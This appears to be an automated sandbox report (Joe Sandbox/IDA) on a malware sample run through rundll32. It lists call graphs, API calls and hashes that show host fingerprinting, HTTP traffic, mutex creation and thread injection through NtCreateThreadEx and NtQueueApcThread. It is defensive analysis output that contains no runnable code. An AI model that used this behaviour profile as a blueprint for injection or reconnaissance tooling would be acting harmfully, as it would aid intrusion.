17838->17830 17841 276196279e4 17838->17841 17840 27619627ba4 17839->17840 17842 2761964b4e0 RtlFreeHeap 17840->17842 17843 2761964b4e0 RtlFreeHeap 17841->17843 17847 27619627a24 17841->17847 17842->17837 17843->17847 17844 27619627a3f InternetQueryDataAvailable 17845 27619627ae3 17844->17845 17844->17847 17846 2761964b4e0 RtlFreeHeap 17845->17846 17846->17830 17847->17844 17847->17845 17848 27619627a98 RtlReAllocateHeap 17847->17848 17848->17847 17850 27619629400 17849->17850 17851 27619629483 17850->17851 17854 2761964b4e0 RtlFreeHeap 17850->17854 17852 2761964b4e0 RtlFreeHeap 17851->17852 17853 276196294f0 17852->17853 17853->17759 17854->17851 17862 2761962fb20 17855->17862 17857 276196273a4 17858 27619627422 17857->17858 17861 2761962a050 RtlFreeHeap 17857->17861 17859 2761964b4e0 RtlFreeHeap 17858->17859 17860 2761962780a 17859->17860 17860->17798 17861->17857 17863 2761962fb39 17862->17863 17864 2761962fb43 17863->17864 17865 2761962cce0 LdrGetProcedureAddress 17863->17865 17864->17857 17866 2761962fbae 17865->17866 17867 2761962cce0 LdrGetProcedureAddress 17866->17867 17868 2761962fbc9 17867->17868 17869 2761962cce0 LdrGetProcedureAddress 17868->17869 17870 2761962fbf0 17869->17870 17871 2761962cce0 LdrGetProcedureAddress 17870->17871 17871->17864 17882 276196217f5 17872->17882 17873 2761962180f 17874 2761964b4e0 RtlFreeHeap 17873->17874 17875 27619621820 17874->17875 17876 2761964b4e0 RtlFreeHeap 17875->17876 17877 27619621838 17876->17877 17878 2761962a050 RtlFreeHeap 17877->17878 17879 27619621b61 17877->17879 17880 2761964b4e0 RtlFreeHeap 17877->17880 17878->17877 17879->17615 17880->17877 17882->17873 17887 27619624cd0 17882->17887 17884 276196451e5 17883->17884 17885 2761964b4e0 RtlFreeHeap 17884->17885 17886 27619628e86 17884->17886 17885->17886 17886->17635 17888 27619654360 NtCreateThreadEx 17887->17888 17889 27619624d3d 17888->17889 17890 27619654ff0 NtQueueApcThread 17889->17890 17891 27619624d58 17890->17891 17891->17882 16730 276196271b0 16731 
276196271c6 16730->16731 16738 27619622950 16731->16738 16734 276196271f5 16755 27619654360 16734->16755 16737 2761962732d 16763 276196316a0 16738->16763 16740 27619622959 16935 276196301a0 16740->16935 16742 27619622963 16743 27619630f99 16742->16743 17139 2761962cce0 16742->17139 16743->16734 16746 2761962cce0 LdrGetProcedureAddress 16747 27619630f13 16746->16747 16748 2761962cce0 LdrGetProcedureAddress 16747->16748 16749 27619630f3c 16748->16749 16750 2761962cce0 LdrGetProcedureAddress 16749->16750 16751 27619630f5b 16750->16751 16752 2761962cce0 LdrGetProcedureAddress 16751->16752 16753 27619630f7a 16752->16753 16754 2761962cce0 LdrGetProcedureAddress 16753->16754 16754->16743 16756 276196543bd 16755->16756 16757 2761962730e 16756->16757 16758 2761965444e NtCreateThreadEx 16756->16758 16759 27619654ff0 16757->16759 16758->16757 16761 27619655011 16759->16761 16760 2761965506c 16760->16737 16761->16760 16762 2761965506a NtQueueApcThread 16761->16762 16762->16760 16764 276196316a9 16763->16764 16765 276196321e1 16764->16765 16766 2761962cce0 LdrGetProcedureAddress 16764->16766 16765->16740 16767 276196316c8 16766->16767 16768 2761962cce0 LdrGetProcedureAddress 16767->16768 16769 276196316e0 16768->16769 16770 2761962cce0 LdrGetProcedureAddress 16769->16770 16771 276196316f8 16770->16771 16772 2761962cce0 LdrGetProcedureAddress 16771->16772 16773 27619631710 16772->16773 16774 2761962cce0 LdrGetProcedureAddress 16773->16774 16775 27619631728 16774->16775 16776 2761962cce0 LdrGetProcedureAddress 16775->16776 16777 27619631740 16776->16777 16778 2761962cce0 LdrGetProcedureAddress 16777->16778 16779 27619631758 16778->16779 16780 2761962cce0 LdrGetProcedureAddress 16779->16780 16781 27619631770 16780->16781 16782 2761962cce0 LdrGetProcedureAddress 16781->16782 16783 27619631788 16782->16783 16784 2761962cce0 LdrGetProcedureAddress 16783->16784 16785 276196317a0 16784->16785 16786 2761962cce0 LdrGetProcedureAddress 16785->16786 16787 276196317b8 16786->16787 16788 
2761962cce0 LdrGetProcedureAddress 16787->16788 16789 276196317d0 16788->16789 16790 2761962cce0 LdrGetProcedureAddress 16789->16790 16791 276196317e8 16790->16791 16792 2761962cce0 LdrGetProcedureAddress 16791->16792 16793 27619631800 16792->16793 16794 2761962cce0 LdrGetProcedureAddress 16793->16794 16795 27619631818 16794->16795 16796 2761962cce0 LdrGetProcedureAddress 16795->16796 16797 27619631830 16796->16797 16798 2761962cce0 LdrGetProcedureAddress 16797->16798 16799 27619631848 16798->16799 16800 2761962cce0 LdrGetProcedureAddress 16799->16800 16801 27619631860 16800->16801 16802 2761962cce0 LdrGetProcedureAddress 16801->16802 16803 27619631878 16802->16803 16804 2761962cce0 LdrGetProcedureAddress 16803->16804 16805 27619631890 16804->16805 16806 2761962cce0 LdrGetProcedureAddress 16805->16806 16807 276196318a8 16806->16807 16808 2761962cce0 LdrGetProcedureAddress 16807->16808 16809 276196318c0 16808->16809 16810 2761962cce0 LdrGetProcedureAddress 16809->16810 16811 276196318d8 16810->16811 16812 2761962cce0 LdrGetProcedureAddress 16811->16812 16813 276196318f0 16812->16813 16814 2761962cce0 LdrGetProcedureAddress 16813->16814 16815 27619631908 16814->16815 16816 2761962cce0 LdrGetProcedureAddress 16815->16816 16817 27619631920 16816->16817 16818 2761962cce0 LdrGetProcedureAddress 16817->16818 16819 27619631938 16818->16819 16820 2761962cce0 LdrGetProcedureAddress 16819->16820 16821 27619631950 16820->16821 16822 2761962cce0 LdrGetProcedureAddress 16821->16822 16823 27619631968 16822->16823 16824 2761962cce0 LdrGetProcedureAddress 16823->16824 16825 27619631980 16824->16825 16826 2761962cce0 LdrGetProcedureAddress 16825->16826 16827 27619631998 16826->16827 16828 2761962cce0 LdrGetProcedureAddress 16827->16828 16829 276196319b0 16828->16829 16830 2761962cce0 LdrGetProcedureAddress 16829->16830 16831 276196319c8 16830->16831 16832 2761962cce0 LdrGetProcedureAddress 16831->16832 16833 276196319e0 16832->16833 16834 2761962cce0 LdrGetProcedureAddress 
16833->16834 16835 276196319f8 16834->16835 16836 2761962cce0 LdrGetProcedureAddress 16835->16836 16837 27619631a10 16836->16837 16838 2761962cce0 LdrGetProcedureAddress 16837->16838 16839 27619631a28 16838->16839 16840 2761962cce0 LdrGetProcedureAddress 16839->16840 16841 27619631a40 16840->16841 16842 2761962cce0 LdrGetProcedureAddress 16841->16842 16843 27619631a58 16842->16843 16844 2761962cce0 LdrGetProcedureAddress 16843->16844 16845 27619631a70 16844->16845 16846 2761962cce0 LdrGetProcedureAddress 16845->16846 16847 27619631a88 16846->16847 16848 2761962cce0 LdrGetProcedureAddress 16847->16848 16849 27619631aa0 16848->16849 16850 2761962cce0 LdrGetProcedureAddress 16849->16850 16851 27619631ab8 16850->16851 16852 2761962cce0 LdrGetProcedureAddress 16851->16852 16853 27619631ad0 16852->16853 16854 2761962cce0 LdrGetProcedureAddress 16853->16854 16855 27619631ae8 16854->16855 16856 2761962cce0 LdrGetProcedureAddress 16855->16856 16857 27619631b00 16856->16857 16858 2761962cce0 LdrGetProcedureAddress 16857->16858 16859 27619631b18 16858->16859 16860 2761962cce0 LdrGetProcedureAddress 16859->16860 16861 27619631b30 16860->16861 16862 2761962cce0 LdrGetProcedureAddress 16861->16862 16863 27619631b48 16862->16863 16864 2761962cce0 LdrGetProcedureAddress 16863->16864 16865 27619631b60 16864->16865 16866 2761962cce0 LdrGetProcedureAddress 16865->16866 16867 27619631b78 16866->16867 16868 2761962cce0 LdrGetProcedureAddress 16867->16868 16869 27619631b90 16868->16869 16870 2761962cce0 LdrGetProcedureAddress 16869->16870 16871 27619631bc1 16870->16871 16872 2761962cce0 LdrGetProcedureAddress 16871->16872 16873 27619631bf2 16872->16873 16874 2761962cce0 LdrGetProcedureAddress 16873->16874 16875 27619631c23 16874->16875 16876 2761962cce0 LdrGetProcedureAddress 16875->16876 16877 27619631c54 16876->16877 16878 2761962cce0 LdrGetProcedureAddress 16877->16878 16879 27619631c85 16878->16879 16880 2761962cce0 LdrGetProcedureAddress 16879->16880 16881 27619631cb6 16880->16881 
16882 2761962cce0 LdrGetProcedureAddress 16881->16882 16883 27619631ce7 16882->16883 16884 2761962cce0 LdrGetProcedureAddress 16883->16884 16885 27619631d18 16884->16885 16886 2761962cce0 LdrGetProcedureAddress 16885->16886 16887 27619631d49 16886->16887 16888 2761962cce0 LdrGetProcedureAddress 16887->16888 16889 27619631d7a 16888->16889 16890 2761962cce0 LdrGetProcedureAddress 16889->16890 16891 27619631dab 16890->16891 16892 2761962cce0 LdrGetProcedureAddress 16891->16892 16893 27619631ddc 16892->16893 16894 2761962cce0 LdrGetProcedureAddress 16893->16894 16895 27619631e0d 16894->16895 16896 2761962cce0 LdrGetProcedureAddress 16895->16896 16897 27619631e3e 16896->16897 16898 2761962cce0 LdrGetProcedureAddress 16897->16898 16899 27619631e6f 16898->16899 16900 2761962cce0 LdrGetProcedureAddress 16899->16900 16901 27619631ea0 16900->16901 16902 2761962cce0 LdrGetProcedureAddress 16901->16902 16903 27619631ed1 16902->16903 16904 2761962cce0 LdrGetProcedureAddress 16903->16904 16905 27619631f02 16904->16905 16906 2761962cce0 LdrGetProcedureAddress 16905->16906 16907 27619631f33 16906->16907 16908 2761962cce0 LdrGetProcedureAddress 16907->16908 16909 27619631f64 16908->16909 16910 2761962cce0 LdrGetProcedureAddress 16909->16910 16911 27619631f95 16910->16911 16912 2761962cce0 LdrGetProcedureAddress 16911->16912 16913 27619631fc6 16912->16913 16914 2761962cce0 LdrGetProcedureAddress 16913->16914 16915 27619631ff7 16914->16915 16916 2761962cce0 LdrGetProcedureAddress 16915->16916 16917 27619632028 16916->16917 16918 2761962cce0 LdrGetProcedureAddress 16917->16918 16919 27619632059 16918->16919 16920 2761962cce0 LdrGetProcedureAddress 16919->16920 16921 2761963208a 16920->16921 16922 2761962cce0 LdrGetProcedureAddress 16921->16922 16923 276196320bb 16922->16923 16924 2761962cce0 LdrGetProcedureAddress 16923->16924 16925 276196320ec 16924->16925 16926 2761962cce0 LdrGetProcedureAddress 16925->16926 16927 2761963211d 16926->16927 16928 2761962cce0 LdrGetProcedureAddress 
16927->16928 16929 2761963214e 16928->16929 16930 2761962cce0 LdrGetProcedureAddress 16929->16930 16931 2761963217f 16930->16931 16932 2761962cce0 LdrGetProcedureAddress 16931->16932 16933 276196321b0 16932->16933 16934 2761962cce0 LdrGetProcedureAddress 16933->16934 16934->16765 16936 276196301ce 16935->16936 16937 2761962cce0 LdrGetProcedureAddress 16936->16937 17138 27619630e4a 16936->17138 16938 27619630228 16937->16938 16939 2761962cce0 LdrGetProcedureAddress 16938->16939 16940 27619630243 16939->16940 16941 2761962cce0 LdrGetProcedureAddress 16940->16941 16942 2761963026c 16941->16942 16943 2761962cce0 LdrGetProcedureAddress 16942->16943 16944 2761963028b 16943->16944 16945 2761962cce0 LdrGetProcedureAddress 16944->16945 16946 276196302aa 16945->16946 16947 2761962cce0 LdrGetProcedureAddress 16946->16947 16948 276196302c9 16947->16948 16949 2761962cce0 LdrGetProcedureAddress 16948->16949 16950 276196302e8 16949->16950 16951 2761962cce0 LdrGetProcedureAddress 16950->16951 16952 27619630307 16951->16952 16953 2761962cce0 LdrGetProcedureAddress 16952->16953 16954 27619630326 16953->16954 16955 2761962cce0 LdrGetProcedureAddress 16954->16955 16956 27619630345 16955->16956 16957 2761962cce0 LdrGetProcedureAddress 16956->16957 16958 27619630364 16957->16958 16959 2761962cce0 LdrGetProcedureAddress 16958->16959 16960 27619630383 16959->16960 16961 2761962cce0 LdrGetProcedureAddress 16960->16961 16962 276196303a2 16961->16962 16963 2761962cce0 LdrGetProcedureAddress 16962->16963 16964 276196303c1 16963->16964 16965 2761962cce0 LdrGetProcedureAddress 16964->16965 16966 276196303e0 16965->16966 16967 2761962cce0 LdrGetProcedureAddress 16966->16967 16968 276196303ff 16967->16968 16969 2761962cce0 LdrGetProcedureAddress 16968->16969 16970 2761963041e 16969->16970 16971 2761962cce0 LdrGetProcedureAddress 16970->16971 16972 2761963043d 16971->16972 16973 2761962cce0 LdrGetProcedureAddress 16972->16973 16974 2761963045c 16973->16974 16975 2761962cce0 LdrGetProcedureAddress 
16974->16975 16976 2761963047b 16975->16976 16977 2761962cce0 LdrGetProcedureAddress 16976->16977 16978 2761963049a 16977->16978 16979 2761962cce0 LdrGetProcedureAddress 16978->16979 16980 276196304b9 16979->16980 16981 2761962cce0 LdrGetProcedureAddress 16980->16981 16982 276196304d8 16981->16982 16983 2761962cce0 LdrGetProcedureAddress 16982->16983 16984 276196304f7 16983->16984 16985 2761962cce0 LdrGetProcedureAddress 16984->16985 16986 27619630516 16985->16986 16987 2761962cce0 LdrGetProcedureAddress 16986->16987 16988 27619630535 16987->16988 16989 2761962cce0 LdrGetProcedureAddress 16988->16989 16990 27619630554 16989->16990 16991 2761962cce0 LdrGetProcedureAddress 16990->16991 16992 27619630573 16991->16992 16993 2761962cce0 LdrGetProcedureAddress 16992->16993 16994 27619630592 16993->16994 16995 2761962cce0 LdrGetProcedureAddress 16994->16995 16996 276196305b1 16995->16996 16997 2761962cce0 LdrGetProcedureAddress 16996->16997 16998 276196305d0 16997->16998 16999 2761962cce0 LdrGetProcedureAddress 16998->16999 17000 276196305ef 16999->17000 17001 2761962cce0 LdrGetProcedureAddress 17000->17001 17002 2761963060e 17001->17002 17003 2761962cce0 LdrGetProcedureAddress 17002->17003 17004 2761963062d 17003->17004 17005 2761962cce0 LdrGetProcedureAddress 17004->17005 17006 2761963064c 17005->17006 17007 2761962cce0 LdrGetProcedureAddress 17006->17007 17008 2761963066b 17007->17008 17009 2761962cce0 LdrGetProcedureAddress 17008->17009 17010 2761963068a 17009->17010 17011 2761962cce0 LdrGetProcedureAddress 17010->17011 17012 276196306a9 17011->17012 17013 2761962cce0 LdrGetProcedureAddress 17012->17013 17014 276196306c8 17013->17014 17015 2761962cce0 LdrGetProcedureAddress 17014->17015 17016 276196306e7 17015->17016 17017 2761962cce0 LdrGetProcedureAddress 17016->17017 17018 27619630706 17017->17018 17019 2761962cce0 LdrGetProcedureAddress 17018->17019 17020 27619630725 17019->17020 17021 2761962cce0 LdrGetProcedureAddress 17020->17021 17022 27619630744 17021->17022 
17023 2761962cce0 LdrGetProcedureAddress 17022->17023 17024 27619630763 17023->17024 17025 2761962cce0 LdrGetProcedureAddress 17024->17025 17026 27619630782 17025->17026 17027 2761962cce0 LdrGetProcedureAddress 17026->17027 17028 276196307a1 17027->17028 17029 2761962cce0 LdrGetProcedureAddress 17028->17029 17030 276196307c0 17029->17030 17031 2761962cce0 LdrGetProcedureAddress 17030->17031 17032 276196307df 17031->17032 17033 2761962cce0 LdrGetProcedureAddress 17032->17033 17034 276196307fe 17033->17034 17035 2761962cce0 LdrGetProcedureAddress 17034->17035 17036 2761963081d 17035->17036 17037 2761962cce0 LdrGetProcedureAddress 17036->17037 17038 2761963083c 17037->17038 17039 2761962cce0 LdrGetProcedureAddress 17038->17039 17040 2761963085b 17039->17040 17041 2761962cce0 LdrGetProcedureAddress 17040->17041 17042 2761963087a 17041->17042 17043 2761962cce0 LdrGetProcedureAddress 17042->17043 17044 27619630899 17043->17044 17045 2761962cce0 LdrGetProcedureAddress 17044->17045 17046 276196308b8 17045->17046 17047 2761962cce0 LdrGetProcedureAddress 17046->17047 17048 276196308d7 17047->17048 17049 2761962cce0 LdrGetProcedureAddress 17048->17049 17050 276196308f6 17049->17050 17051 2761962cce0 LdrGetProcedureAddress 17050->17051 17052 27619630915 17051->17052 17053 2761962cce0 LdrGetProcedureAddress 17052->17053 17054 27619630934 17053->17054 17055 2761962cce0 LdrGetProcedureAddress 17054->17055 17056 27619630953 17055->17056 17057 2761962cce0 LdrGetProcedureAddress 17056->17057 17058 27619630972 17057->17058 17059 2761962cce0 LdrGetProcedureAddress 17058->17059 17060 27619630991 17059->17060 17061 2761962cce0 LdrGetProcedureAddress 17060->17061 17062 276196309b0 17061->17062 17063 2761962cce0 LdrGetProcedureAddress 17062->17063 17064 276196309cf 17063->17064 17065 2761962cce0 LdrGetProcedureAddress 17064->17065 17066 276196309ee 17065->17066 17067 2761962cce0 LdrGetProcedureAddress 17066->17067 17068 27619630a0d 17067->17068 17069 2761962cce0 LdrGetProcedureAddress 

                                                                    Control-flow Graph

                                                                    control_flow_graph 0 27619644d00-27619644daf GetUserNameW GetComputerNameExW 1 27619644dc7-27619644df1 GetComputerNameExW call 27619654ad0 0->1 2 27619644db1-27619644dc1 call 2761964b4c0 0->2 7 27619644e58-27619644e92 call 27619652750 call 2761963dfc0 1->7 8 27619644df3-27619644e1a GetTokenInformation 1->8 2->1 22 27619644eaa-27619644ed1 GetNativeSystemInfo 7->22 23 27619644e94-27619644ea5 call 27619653de0 7->23 9 27619644e1c-27619644e28 8->9 10 27619644e4e-27619644e53 call 27619654000 8->10 12 27619644e2a-27619644e39 call 27619653de0 9->12 13 27619644e3e-27619644e49 call 27619653de0 9->13 10->7 12->13 13->10 25 27619644ee8-27619644eec 22->25 26 27619644ed3-27619644ee6 22->26 23->22 28 27619644f17-27619644f2d call 27619653de0 25->28 29 27619644eee-27619644efd 25->29 27 27619644f01-27619644f15 call 27619653de0 26->27 33 27619644f32-27619644f42 27->33 28->33 29->27 35 27619644f89-27619644fb9 GetAdaptersInfo 33->35 36 27619644f44-27619644f84 call 27619653b90 call 27619653de0 call 27619653b90 * 2 33->36 40 27619644fbb-27619644fdc call 2761964b4e0 * 2 35->40 41 27619644fdd-27619644fe3 35->41 36->35 41->40 44 27619644fe5-27619644ffd call 2761964b4c0 GetAdaptersInfo 41->44 44->40 53 27619644fff-2761964500c 44->53 55 27619645012-27619645015 53->55 55->40 56 27619645017-27619645018 55->56 57 2761964501f-27619645031 call 276196293e0 56->57 60 27619645033-27619645043 call 27619653de0 57->60 61 27619645045-2761964504c 57->61 60->57 61->40 63 27619645052-27619645062 call 27619653de0 61->63 63->55
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    • Opcode ID: 0a5131bd6414b1282a0f66d752e02dd7b2870491c20533042b7ec16988b63654
                                                                    • Instruction ID: fc6de5b0a4b9f929ec2e02aaa9f65fb1ffd1ede883d057874adf6f2846d3f2c9
                                                                    • Opcode Fuzzy Hash: 0a5131bd6414b1282a0f66d752e02dd7b2870491c20533042b7ec16988b63654
                                                                    • Instruction Fuzzy Hash: 47A1D33021CF888BFB54AB54D86E7DAB3E1FB94740F804529A84ED3392DA74D945CBD2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2422249435.00007DF4051C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4051C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_7df4051c0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989
                                                                    • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction ID: fead47ab9d65bdae9bed47f4f8db019143a3840a82c3428f943998f4b283dea3
                                                                    • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction Fuzzy Hash: 0C71CF31614A4C8FEB94EF5CC858BAD77F1FB98315F104226E81ED72A0DB749954CB80

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    • Opcode ID: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
                                                                    • Instruction ID: 08cf26aaf3ffd475687a30ed649e88e22e4444696bc88a3495641704f5194b68
                                                                    • Opcode Fuzzy Hash: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
                                                                    • Instruction Fuzzy Hash: CE51D37410CA488FF748EF28D85D7B977E1FB96311F500259E49ED32A2CA38E802CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction ID: 84887cc101af63f21472ff77c1b48dcdc3a013849f0ae69c618340443e559901
                                                                    • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction Fuzzy Hash: F6F081B0618B408BE7549F1884C967577E1FB98755F64452EE88A87361CB319842CB43
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction ID: e3303e5ee617160796ebabb4e0090f83c55a9886ee24f68c5a044d4337b42e1d
                                                                    • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction Fuzzy Hash: 3AF05470A28F444BD744AF2C884E63577E1FBA8645F54452EA84DD7361DB35E4428B43

                                                                    Control-flow Graph

                                                                    control_flow_graph 67 27619627830-27619627883 68 2761962788a-27619627892 InternetOpenW 67->68 69 27619627885-27619627888 67->69 70 27619627898-276196278d7 InternetConnectW 68->70 71 27619627af9-27619627afd 68->71 69->68 70->71 72 276196278dd-2761962792b 70->72 73 27619627aff-27619627b0c 71->73 72->73 79 27619627931-2761962793b 72->79 74 27619627b17-27619627b1a 73->74 75 27619627b0e-27619627b11 InternetCloseHandle 73->75 77 27619627b1c-27619627b1d 74->77 78 27619627b25-27619627b28 74->78 75->74 77->78 80 27619627b2a-27619627b2b 78->80 81 27619627b33-27619627b3b 78->81 84 2761962793d-27619627945 79->84 85 27619627990-276196279ab 79->85 80->81 82 27619627bd0-27619627be3 81->82 83 27619627b41-27619627b4b 81->83 86 27619627b4d-27619627b54 call 27619651230 83->86 87 27619627b62-27619627b73 83->87 84->85 88 27619627947-2761962798b call 27619652750 * 2 84->88 85->73 96 276196279b1-276196279ba 85->96 86->87 98 27619627b56-27619627b60 call 2761964b4e0 86->98 91 27619627b7a-27619627b8a call 2761962cb60 87->91 92 27619627b75-27619627b78 87->92 88->85 105 27619627b8c-27619627bb8 call 2761962a050 call 2761964b4e0 91->105 106 27619627bba-27619627bce call 27619651410 91->106 92->82 92->91 99 276196279e6-27619627a0a 96->99 100 276196279bc-276196279de call 27619651270 HttpSendRequestA 96->100 98->82 114 27619627a0c 99->114 100->73 117 276196279e4-27619627a16 100->117 105->82 106->82 106->98 114->100 121 27619627a18-27619627a1f call 2761964b4e0 117->121 122 27619627a24-27619627a3b call 2761964b4c0 117->122 121->122 126 27619627a3f-27619627a5b InternetQueryDataAvailable 122->126 127 27619627a61-27619627a69 126->127 128 27619627ae3-27619627af7 call 2761964b4e0 126->128 127->128 130 27619627a6b-27619627a7e 127->130 128->75 130->128 133 27619627a80-27619627a86 130->133 133->128 134 27619627a88-27619627a96 133->134 135 27619627a98-27619627aaa RtlReAllocateHeap 134->135 136 27619627aac-27619627aaf call 2761964b4c0 134->136 
137 27619627ab4-27619627ade call 276196444a0 135->137 136->137 137->126
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Heap$AllocateAvailableCloseConnectDataFreeHandleHttpOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 2835091696-0
                                                                    • Opcode ID: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                    • Instruction ID: 0f1ed005750c748dbc9d23cfe8e8163e65e43a26c0587a977b48f03841931230
                                                                    • Opcode Fuzzy Hash: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                    • Instruction Fuzzy Hash: 37B18F3021CF488BF754DF28D85DBAAB7D5FB98340F840569A84ED3295DB78E84187D2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2422249435.00007DF4051C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4051C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_7df4051c0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0
                                                                    • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction ID: af99fb76aaf4e5721d71b51a7dd243436e203d07f8fec3dc3f2df2350f77f626
                                                                    • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction Fuzzy Hash: 1221CB3061494C8FEBA1EB5CCC58BEE37F1FBA8310F404226D81EDB294EE35AA548750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction ID: a7e0b9079de08a95b49619071a62cc12b65e588fa82c2ecefcbe085ecc7218d2
                                                                    • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction Fuzzy Hash: 73E11071408B4D8FE751EF14E899BA6B7F4F768340F60067BE84EC2261DB389245CB86

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0
                                                                    • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction ID: b47bf944f9c2fc0dd592b549e4c4f9870292d50b392e239e642c9d8d976641f2
                                                                    • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction Fuzzy Hash: BF31B23151CB484BE764AB58DC4E7BAB7E0FB85310F90066EE58EC3352D630A98687D7

                                                                    Control-flow Graph

                                                                    control_flow_graph 284 2761964b4e0-2761964b4ee 285 2761964b523-2761964b52f 284->285 286 2761964b4f0-2761964b505 284->286 286->285 288 2761964b507-2761964b51d call 27619644ce0 RtlFreeHeap 286->288 288->285
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction ID: 36e3705b53a2d51f62ba3b1d0ab3bbc7a3e1b552114c7753f11056e38f7bdf1f
                                                                    • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction Fuzzy Hash: A4F01C30314E088BFB58EBBAECDD76577E2FB9C341B848054A409C7294DB389841CB52
                                                                    Memory Dump Source
